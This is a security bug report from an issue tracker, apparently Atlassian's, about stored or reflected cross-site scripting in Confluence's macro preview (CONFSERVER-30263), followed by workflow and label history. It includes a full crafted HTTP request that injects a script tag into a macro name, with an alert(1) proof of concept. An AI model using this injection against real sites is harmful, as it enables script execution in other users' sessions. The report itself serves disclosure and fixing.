High Example:
- insert lorem ipsum macro
- edit macro in lightbox and press preview
- alter the post request as follows:
POST /confluence/rest/tinymce/1/macro/preview HTTP/1.1
Host: test.foo.com
Connection: keep-alive
Content-Length: 136
Accept: text/html, /; q=0.01
Origin: https://test.foo.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31
Content-Type: application/json; charset=UTF-8
Referer: https://test.foo.com/confluence/pages/editpage.action?pageId=123456
Accept-Encoding: gzip,deflate,sdch
Accept-Language: de-DE,de;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: [...]
{"contentId":"12345","macro":{"name":"lorem-ipsum<script>alert(1)</script>","body":""}}
- an alert box pops up
This kind of attack works for all macros available
- mentioned in
-
Wiki Page Failed to load
[CONFSERVER-30263] XSS attack in macro rendering preview
| Workflow | Original: JAC Bug Workflow v3 [ 2875337 ] | New: CONFSERVER Bug Workflow v4 [ 3003740 ] |
| Workflow | Original: JAC Bug Workflow v2 [ 2803304 ] | New: JAC Bug Workflow v3 [ 2875337 ] |
| Status | Original: Resolved [ 5 ] | New: Closed [ 6 ] |
| Workflow | Original: JAC Bug Workflow [ 2735992 ] | New: JAC Bug Workflow v2 [ 2803304 ] |
| Workflow | Original: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2400890 ] | New: JAC Bug Workflow [ 2735992 ] |
| Labels | Original: affects-server bugfix cvss-high editor loyalty security xss | New: affects-server cvss-high editor loyalty security xss |
| Labels | Original: affects-server bugfix cvss-high editor security xss | New: affects-server bugfix cvss-high editor loyalty security xss |
| Workflow | Original: Confluence Workflow - Public Facing - Restricted v5 [ 2300702 ] | New: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2400890 ] |
| Workflow | Original: Confluence Workflow - Public Facing - Restricted v5.1 - TEMP [ 2234701 ] | New: Confluence Workflow - Public Facing - Restricted v5 [ 2300702 ] |
| Workflow | Original: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2197419 ] | New: Confluence Workflow - Public Facing - Restricted v5.1 - TEMP [ 2234701 ] |
| Workflow | Original: Confluence Workflow - Public Facing - Restricted v5 [ 1922840 ] | New: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2197419 ] |